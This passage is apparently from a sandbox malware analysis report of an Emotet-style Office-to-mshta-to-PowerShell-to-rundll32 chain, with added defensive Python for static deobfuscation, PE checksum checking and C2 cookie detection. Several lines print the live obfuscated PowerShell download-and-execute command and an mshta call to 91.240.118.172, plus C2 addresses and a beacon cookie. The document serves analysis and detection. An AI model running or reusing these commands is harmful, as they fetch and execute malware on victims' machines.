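                hits.add((e.pid, "rundll32_suspicious_module"))
            if any(basename(a.image) in OFFICE for a in ancestors(e, by_pid)):
                hits.add((e.pid, "rundll32_descends_from_office"))
    return hits


if __name__ == "__main__":
    for pid, rule in sorted(evaluate(EVENTS)):
        print(f"pid {pid:>2}  {rule}")
```

Keying the rules on the full ancestry (rundll32_descends_from_office) rather than only on the immediate parent is what catches the later rundll32 stages, whose direct parent is just another rundll32.exe; a real deployment would use the Sysmon ProcessGuid/ParentProcessGuid fields instead of raw PIDs, which are reused.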
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE417.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00765988 CreateToolhelp32Snapshot, 13_2_00765988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
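
The powershell.exe command line in the process list above hides (New-Object Net.WebClient).DownloadString(...) by splitting it into three single-quoted literals padded with the junk token {FdrggvdRf}, stripping the token with .replace(), joining the pieces with -Join and feeding the result to a backtick-escaped I`E`X twice (once to build the expression, once to execute whatever fe.png returns). The ".net clr networking" mutant on the line above is the .NET networking stack initialising for that WebClient call. Added example, not from the report: a Python script that applies those same transformations statically, without executing anything, and returns the recovered expression and URL. It assumes only the constructs seen in this command line (single-quoted literals, .replace(junk, ''), -Join '', backtick-escaped IEX); other variants will need the patterns extended.

```python
import re

# The script argument of the powershell.exe command line recorded in this report,
# copied verbatim from the mshta.exe -> powershell.exe "Process created" entry.
OBSERVED_CMDLINE = r"""$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"""

# $name='literal'.replace('junk', '')  -- the single-quoted literal may contain '' escapes
JUNK_ASSIGN = re.compile(
    r"\$(?P<name>\w+)\s*=\s*'(?P<lit>(?:[^']|'')*)'\.replace\('(?P<junk>[^']*)',\s*''\)")
# $name=($a,$b,$c -Join '')
JOIN_ASSIGN = re.compile(r"\$(?P<name>\w+)\s*=\s*\((?P<parts>[^()]*?)\s+-Join\s+''\)", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def ps_unquote(literal):
    """Inside a PowerShell single-quoted string the only escape is '' -> '."""
    return literal.replace("''", "'")


def strip_backticks(token):
    """Outside double-quoted strings a backtick before a letter only escapes it: I`E`X -> IEX."""
    return re.sub(r"`(?=[A-Za-z])", "", token)


def deobfuscate(cmdline):
    """Statically evaluate the junk-token, -Join and backtick tricks; never runs the script."""
    variables = {}
    for m in JUNK_ASSIGN.finditer(cmdline):
        variables[m["name"]] = ps_unquote(m["lit"]).replace(m["junk"], "")
    for m in JOIN_ASSIGN.finditer(cmdline):
        names = re.findall(r"\$(\w+)", m["parts"])
        variables[m["name"]] = "".join(variables.get(n, "") for n in names)
    tail = strip_backticks(cmdline.rsplit(";", 1)[-1])      # e.g. "IEX $JI|IEX"
    invoked = re.findall(r"\bIEX\s+\$(\w+)", tail, re.I)    # which variable is executed
    payload = variables.get(invoked[0], "") if invoked else ""
    return {
        "variables": variables,
        "payload": payload,
        "urls": URL.findall(payload),
        # a second IEX means the downloaded text is itself executed as script
        "double_iex": len(re.findall(r"\bIEX\b", tail, re.I)) >= 2,
    }


if __name__ == "__main__":
    result = deobfuscate(OBSERVED_CMDLINE)
    print(result["payload"])
    print("downloads:", result["urls"], "| second-stage executed:", result["double_iex"])
```

The recovered expression is (New-Object Net.WebClient).DownloadString('http://91.240.118.172/cc/vv/fe.png'); the .png extension is only a disguise for the PowerShell text that writes C:\ProgramData\JooSee.dll in the next stage. Static recovery like this is preferable to running the line under a logging PowerShell because it neither contacts the host nor depends on the server still serving the same second stage.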
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: 4885.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_032200BF push 8B490264h; iretd 4_3_032200C5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032208D0 push 8B490264h; iretd 4_3_032208D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10032B7D push ecx; ret 10_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030DFF push ecx; ret 10_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10032B7D push ecx; ret 12_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10030DFF push ecx; ret 12_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 10_2_1003D873
Source: JooSee.dll.7.dr Static PE information: header CheckSum 0x8df98 does not match the value computed over the file, 0x921ce
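
The dropped JooSee.dll carries a header CheckSum (0x8df98) that no longer matches its contents (0x921ce), a common side effect of a packer or post-link patching. Added example, not from the report and not the Joe Sandbox implementation: a Python routine that recomputes the image checksum the way imagehlp's CheckSumMappedFile does and reports the mismatch. It runs on any PE file given on the command line; without one it uses a constructed 512-byte header stand-in (not the sample) whose stored value is deliberately wrong. Caveat a practitioner should keep in mind: the user-mode loader does not enforce this field (only kernel-mode and boot-critical images are checked), so a mismatch is evidence of tampering or packing, not of malice on its own, and plenty of clean software ships with it unset or stale.

```python
import struct


def checksum_field_offset(data):
    """Offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE\\0\\0) + 20 (COFF header) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    off = e_lfanew + 4 + 20 + 64
    if off % 4:
        raise ValueError("unaligned optional header")
    return off


def pe_checksum(data):
    """Recompute the header checksum: sum every 16-bit word with end-around carry,
    skipping the CheckSum field itself, then add the file length. Summing 32-bit
    words and folding the carries gives the same result as the word-wise sum."""
    skip = checksum_field_offset(data)
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data):
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def check(data):
    stored, computed = stored_checksum(data), pe_checksum(data)
    return {"stored": stored, "computed": computed, "mismatch": stored != computed}


def with_checksum(data, value):
    """Return a copy with the CheckSum field rewritten (what a linker's /RELEASE does)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), value)
    return bytes(buf)


def build_minimal_pe(stored=0xDEADBEEF):
    """Constructed 512-byte stand-in (not the dropped DLL): just enough header for the
    offset lookup. The stored CheckSum is deliberately wrong to mimic a patched file."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)     # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x44, 0x14C)    # Machine = i386
    struct.pack_into("<H", buf, 0x54, 0xE0)     # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", buf, 0x58, 0x10B)    # Magic = PE32
    struct.pack_into("<I", buf, 0x98, stored)   # CheckSum at 0x40 + 4 + 20 + 64
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    print(check(data))
```

Run it against the dropped file (python checksum.py JooSee.dll) to reproduce the report's two numbers; the pefile library exposes the same computation as PE.generate_checksum() if you would rather not carry your own copy.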

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Diftwn\pevlwp.arl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100134F0 IsIconic, 10_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 10_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100134F0 IsIconic, 12_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 12_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 1232 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Cookie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000D.00000002.676502532.000000000037A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
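
The Cookie header recovered from rundll32.exe memory above is a single opaque name (BwMZppe) carrying one long base64 blob. That is the shape of Emotet's HTTP check-in, which transports its encrypted request data in a cookie value rather than in a body or query string, so an outbound request whose only cookie looks like this is worth a second look even before the destination is known. Added example, not from the report: a Python triage check that parses a Cookie header, requires exactly one opaque pair, strictly base64-decodes the value and measures the Shannon entropy of the decoded bytes. The observed value is copied from the report; the benign cookie and the thresholds are constructed/assumed and will need tuning against real traffic (long session tokens and encrypted SSO cookies can also trip it).

```python
import base64
import binascii
import math
import re
from collections import Counter

# Copied verbatim from the rundll32.exe memory string in this report.
OBSERVED_COOKIE = "BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4="
# Constructed benign header for contrast.
BENIGN_COOKIE = "PHPSESSID=8f3a2b1c9d; theme=dark; consent=1"


def parse_cookie(header):
    """Split a Cookie header into (name, value) pairs; tolerates stray whitespace."""
    pairs = []
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def shannon_entropy(data):
    """Bits per byte; encrypted or compressed data sits near 8, text near 4-5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def strict_b64(value):
    """Decode only if the value is well-formed standard base64 (alphabet and padding)."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def score_cookie(header, min_value_len=128, min_entropy=6.0):
    """Flag a Cookie header carrying exactly one opaque, long base64 blob whose decoded
    bytes look encrypted. Returns the evidence so the rule can be tuned, not a bare verdict."""
    pairs = parse_cookie(header)
    result = {"pairs": len(pairs), "decoded_len": 0, "entropy": 0.0,
              "reasons": [], "suspicious": False}
    if len(pairs) != 1:
        return result
    name, value = pairs[0]
    if not re.fullmatch(r"[A-Za-z0-9]{1,16}", name):
        return result
    raw = strict_b64(value)
    if raw is None:
        return result
    entropy = shannon_entropy(raw)
    result.update(decoded_len=len(raw), entropy=round(entropy, 2))
    if len(value) >= min_value_len:
        result["reasons"].append("single opaque value of %d chars" % len(value))
    if entropy >= min_entropy:
        result["reasons"].append("decoded payload entropy %.2f bits/byte" % entropy)
    result["suspicious"] = len(result["reasons"]) == 2
    return result


if __name__ == "__main__":
    for label, hdr in (("observed", OBSERVED_COOKIE), ("benign", BENIGN_COOKIE)):
        print(label, score_cookie(hdr))
```

Used on its own this is a hunting heuristic, not a blocking rule; it becomes useful when joined with the rest of the request (POST to a bare IP, no Referer, a generic User-Agent) and with the process that sent it, which here is rundll32.exe rather than a browser.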
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 10_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 10_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767E00 FindFirstFileW, 13_2_00767E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 10_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00224087 mov eax, dword ptr fs:[00000030h] 10_2_00224087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F4087 mov eax, dword ptr fs:[00000030h] 11_2_001F4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00734087 mov eax, dword ptr fs:[00000030h] 12_2_00734087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00774087 mov eax, dword ptr fs:[00000030h] 13_2_00774087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 10_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 10_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 10_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 12_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 12_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
